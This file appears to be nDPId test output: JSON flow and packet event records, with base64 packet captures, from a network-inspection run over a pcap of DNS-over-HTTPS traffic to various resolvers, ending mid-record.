00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946739298533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739298533,"pkt":"REREREREZmZmZmZmCABFAAFD4UdAAL0GsQQKAAABi2PeSNGqAbt5f9qX6vvArlAYAfYrngAAFgMBARYBAAESAwPY4R+kmwrmRkwkOvmL20MZvvmmXV\/QYaA6X4C5e+GFvyA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACA0hS9OEA\/J5twwMByNtSlpgrCPJW9Ooqwd+S9NxEdaCw=="}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946739298797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAWq1TBAACsGSrWLY95ICgAAAQG70arq+8CueX\/bslAQAfmvXQAAFgMDAHoCAAB2AwOWvrm4FPC7V7PYuN+Lshod\/nezEzfqc01CK\/K8f2FrjCA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WRMBAAAuACsAAgMEADMAJAAdACDl61zVHhMWB0BdL3ddlBFKSw5Lr9HVe6EkVLOcYVLAAxQDAwABARcDAwAksgraFQq8T84jfrRmYc223NGnVGbYG\/xj8xk4v\/EJCHm3s9w1FwMDCVmg97DgSdnn53nb0jGLv9F1+4VVO1DlJvFZ4CsfAqRyJ8a0jMqAaeRjhyCNwiDpU+6mevWKgpxWfYNjWShazkI7oaAh0ocoGs0\/Z2Mwn5ZIkIv+OuDwieAM9qTwhi+fGVM4H+qU8v3e8TtrqoxC+IgZVc8V3I+\/yPEjroPH33YYxxjju5aqvElJCjEI4urJQzXoWsAq6uQKccy5WfzKSDhJNZ8AVPquU8SpWKmo\/\/E2qD+dKLWJFgaub29gXMXjQTVzoJxdvVKG52mcWm6EXETLAVeqYVAn1jxtrmpkg13Vk85sRN2hjK5eeu4ap8rf7Lodf5tfmhv8SVfULmdGCNmmvgZMJkjmNfdKrw+XnrBHNQP2GC7kgKzhx++y9Ur+7CtcaZ0Stuv2mMWKbTn30OOZzAWiYjVeWw1PNj6IPMesZYC3bO1PwS8+BOlQEPumskRErqRklUuVJ1OXsXJn8o9P7B9r5RxumsKPZbrYuGjTJfVUwTIwaAH4g\/GODGK2+B5YB\/Z\/6LysjXxF0obthFSDlDUGBTCdDZdGFQyyl8u0xri2sr4xv5TWFpIjmyYys6SXqhW7QRXi8cM\/fGE\/JM+qZpyddar8bHdCLxGlvvPz4eCxh6lg0sugzb6K+mUo6W7gtEoQaKMIAakeMy2FOKQ3NMe5\/F+3b43gHog099YK8NKs2bvSG\/W7LXyo8PnUinj+AVLnzhrSe+qvDBw9a\/Jp7AkHbVoQwt\/EIF5\/d5w+4KMlJPMSzCUov8rfi\/CCF\/iVjvModtxk+gLz4pUaK3XRZHYtLxfH7FHcLizTZ3sSU4i+tweqvPEyxXE1E7Y+KMLDCV+QkbWkWi9gMec8ZJ3GBnIg+iSrehGCt8i8t7Lu9Wc\/2fGKgQfE9jJe\/fDA2odknuy5GV2960tQvEZAXB0c5GJBhjiPYJgYdgJ2fzUt\/xLgBoWg0zKHa\/soHWqBrLympLp+VepVMyzuzIJ6QgGVTCC1EFSrrSUxkNXDsBrwmyRP\/9FLF9pdzZACXTb6S8myrZazmvEdGdk04PjNhUiHGlUT03OYvmagf8Ya\/4VRzGGdV43OAGkQYeu0ZY\/heh9h7fucuCFB8CyBx4wy7OhYHBnDOYz2gdf\/z49N039rzJarMWXOwbROgeoXzcsBH8Uj6StZMCbM\/ZBGWByfEjHDl5w8E1dbyJx5XuC65RezHZrv05dJlBbVSEsHIMbDl7IWOUdhpeDNskZrQ+GdU5boLCtHmvrbs62KT\/zlJm2mOApHTvifRvmqKBz9tPtGNCG6XGCZWhEY3FFyS9rmcTpceJwTCfQYlzYKZslhMKd4J63ankp0RnGQLgodwM35ISK98+Kq2hNOJCTBOCxPPsHuXjZuhXdIi8QCW9VQZqww\/\/NjZPMOPy4jcZ7Tkixh7\/JmbpMEV7PnrhAXh21z+u5dLFH52pKdwGRat6A94UDcInit5rOcJtblnF8P7F8IlQqF3WFZurZBuXzllHTzbwe54UUGPwrqwyOIUkW6zUYU\/09YfhXdyYwY1MnGRAlrE9sPr4V9Vgn7ZntvhQgmKz\/jiHNHuRGaj\/PJAjEPTmoQib9SfYaA5fyYDQmsautNL\/cJ4oyfD9Jembyctib1BIp9Ramfe6PSsBXI\/0Ka52Or"}
00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946739298797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAVy1TFAACsGSuyLY95ICgAAAQG70arq+8YweX\/bslAYAfkcrQAAThemFBuD34j0ZojpR7nDk08tEILyrSrE7HS0zZ4kmhXJJxPvCajO9mPz0f1Ba7CUeJZuC\/ww3Lrn+zD28CW1o9VT3LiWNj\/tk7IhVjR3oxyzXVyp8GIUKoCq+rFgLmVNv3t4E9NSsp0vzaP0F7j0JBrlPSojRxE2tlZsJ5feSSYzKGVucsWX6pYRquGlpuPfdHODx0L8ifTKNZ7sMGSXufTYU71W7zucIJWTJn92oiP3KQmXtYYb39SlVhRkoPmox0CcWIbUIkPk1mOfiZj7ZHZGdjmSkO+stoE+mAIy1qeh6xhTg7nyjAGvTt0OEbSBbL64py0gHtL8p9MnYDH\/rEu94PzROteC\/nq08LwZZof+0aydUgoyNJpYIzziL6obgZ8r3XFfT2yBZeGRYlK+7j980Fzg4IJlxXjB\/7u4t3CFM2KzwkVTOl0QgQ2WdVMZr63UzYIuBqVeqhjDwph8EAIPfj6GHii36awX1ARUIn+i2we8pqEICyjrrtz5abqrvBqhOgUymt9799jpjN96PN89rSa+qz8R5hSWva8Z0q12NMSUqK4V32q2T+XbFuVZUlGqNPo8Q4LGFZXuYD0rXuNudeUYIvyeE2j5uqdZqZHCJg4amyAZz0RTts0c1\/NYqX2y5hPaOLvInAlZn4kgRx8P3JUIFzzVPNJJ35uuAChT5mattKXxu8qwume7sBZMgcO4xIk9V0GeDf7Q0iqbxG1cZybv7JIhiCiaIbji819I0oDOejGbK2XffVEsRj3+LURpVM8fUmFAk669Ff\/Nr+yt6tH9Ktz6qOevm0rhgviDIUwzLNJNTxk3pvt9wNVus\/LUfcLiMKspToabUtDV2KtFlgjUQBZ6M603sQeMbcyD6v4zye6TReEZisbYDNmcge+IFl+e+6gIZYcwnBnjL+IMuKODuiRDaCLQJS72LiQoTClqyWNhk8p3nZX4LJsLVi6dW6cV7ErhFynQJtxWGrvo9DrmvbJGRV80Ul449jTrc22WvgTBKnaXTTsv2pw69IL3ziatAlwA6VUKivZyuSnP\/qeqQsLIM3h1xsud7x+raSQILbisV46QaEMOKNMhEo4f9EE5vYtzwm\/ngKP6CEyyxa5eOnqoj72FpXRNgDKcpbuNQSddL+rkopq\/y8uRR5TATut5xq9zEjEQLnRu3bhaqmLH7wPAre5tejGNaBElH9ZorCCzrnrfL+5ZFV65djnMn\/burxQW9SIIOlDcRe3ddZxIf\/z8dXGWfc\/YJ2alVKWABNBLcFPeFubCnDOGFnp7WaEezUQCo1huX1d\/AR2t9ZFIxb+\/2YA0Fcu4FFOucBmHB64h34YnG1QktWj0QN6yNlW1E24ubX3xPextdjh4av9ufsqLyV+lQC34GqCFKa3D2btbNVuYlf3F\/nsdPHHCRn+svJvZKssoO39MnIg20E8\/NZSYgAW7+dMxM2JbTCDpQf718V5e42Tcc3D\/MVuwLpSLFUnGgbahF3PvczhUvo5QFk5tF0YRiH+1QJX+P4Bld+SLzREBNKhff3\/yg9uJJKca+U+6nBcDAwCBaMxAcfS4h68NX8O4\/JsJCa+QWF87yNO9r0+szCZ1TeWGW\/KMvQNFzX1G+Y2PEnQ68hI4LpJQIC4VjBdW13rCggF8QR46NY3HL4enM7oteZTlqkQvxVphVmRyDsYFcjY4u2fGUw5LFrsQktQhx2VsQTygsXipX2KtdmPdscHLlgGRFwMDADV5C7WBlZ+ocDTA\/zppOjhaktsCXwO0sG+1hu0Zi0K+GaWwxXTJGdG0p2vdDlGf4dOI0eNxTQ=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946739299058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739299058,"pkt":"REREREREZmZmZmZmCABFAAFDIvZAAL0Gb1YKAAABi2PeSNGsAbu+7R6jIfk4pVAYAfYrngAAFgMBARYBAAESAwOSQ8JxHhGuu6wLKnGtwDfaCU9fn2zkXyLvCqG6Z1EJrSA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBvduxHcveHyzSwUHe1UMoR3WO30Q1YJASO6Gqd5f5rOQ=="}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946739299325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAWq+oRAACsGJWGLY95ICgAAAQG70awh+Tilvu0fvlAQAflBFAAAFgMDAHoCAAB2AwO4E1L4A\/\/vaa3qFy7zGtkSllYVpFARFReL8E9wQ5edfiA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62BMBAAAuACsAAgMEADMAJAAdACC6hi7aKoaulrg0kHVy9iX3JtIXsjOWFqMY4JtXoR3ZFBQDAwABARcDAwAkVn7ui3VtyEjBPho8csX4cWU91LDHlldd37yMDuMkm1WrNSA\/FwMDCVkNxERPpxFp1hU3MTygH94nI+uO3MFA6Pgc7Cjgsqv9R94L1LzqnlTJ9qM2GdC3DoaCFMZy2rvnd3TUb44js1wH\/ZjR\/tueYjuCchsydXsjOJIItHXpv6rNdoQc5GxilmSN3ZLV0BdssW6zhxxgQaE3FYajxWXTTfgzUzOS+6W++jmvd1q00zg+8Q0qSguzfNUtyikLzjXqF591w71tmw1RwueDWDRqOR8D9ArOOASC\/gfHKocbf3MYoPn\/L3+LeyjDo7Dan2mPuEUKlItjagedNzassvjfnCKDfWzjTYX1Oj074zzZKYUi326SCBVqvZ4BTAJFklyVRE2\/7w5a9Hu3TkucSU4uD6YDgHvYuwr1PUeuJlpLcTtMIe6KqdQO6VhykmmEfKtsuoqKDau0V16KSQWM2aCvsVesKQ3DSQJg5rL5yIwj9vpyWnaHxDEgfEIDmYjy\/Axgsm7vfVWFF3Jrfc1xzCpgVx2Wzxxl\/maZOzNTYwZUTU3hLDZjHHXTyifvb45snBjXrLw3E9kNt6T2lmZ7d2lzBq35OqiFyiqDdqg5nN+wvKg6FFTseFXwn\/Cnava4JqwJeCYBLZwtvjbxpmY\/Z7bzc6mZPg2Sh+dbDSkCl3bi0C7OGN4lTKk6SakWyrfvl60M9dBFHVDrzgKu7xbDvPEvSNcZq2Dx1QXy2oMyLZnD977uZ9nLe2MaP79hLJNgy4v+jriXtA5fuVRTABndd0eLGpCNoQRcyQEasclWVE0X3djEYjD5W2s+8ID+COBoWOoyP\/WAq9bDmdFuLbZL5YcQMg6OEX37+6VcGXh24mzLjiWqRW2SXZBECP5e9Kp+qBc4nsLJy+\/cCFFzWnnOIeDNkPzITjeYYG62LLpDcjihxenHjNkU8aI6W9z7HJRAKXj15JybI7ZavgKdsyBJSz8Rv17E9WgwJgE24FqtNa6LcXPjCIVJ4JA\/FRIvlJbq2\/PV2grzaPllz7EIQXESn4AAbsSK6v\/afg1rifhsSGv2yYjxwtRB5P9D+FT0dFjO2m9zDYEYLvFPNAv2\/uEF0d+ML9zrDfaDdz6z+wzZI7tOXb+ZgoELySqXWnZpXCKfAbAaRdkBWG9n\/7DEkPQfGc3BRuxecF3gZRN5TjRNnS3L\/z3Mjd0kgq5NvuPBzwr++r8P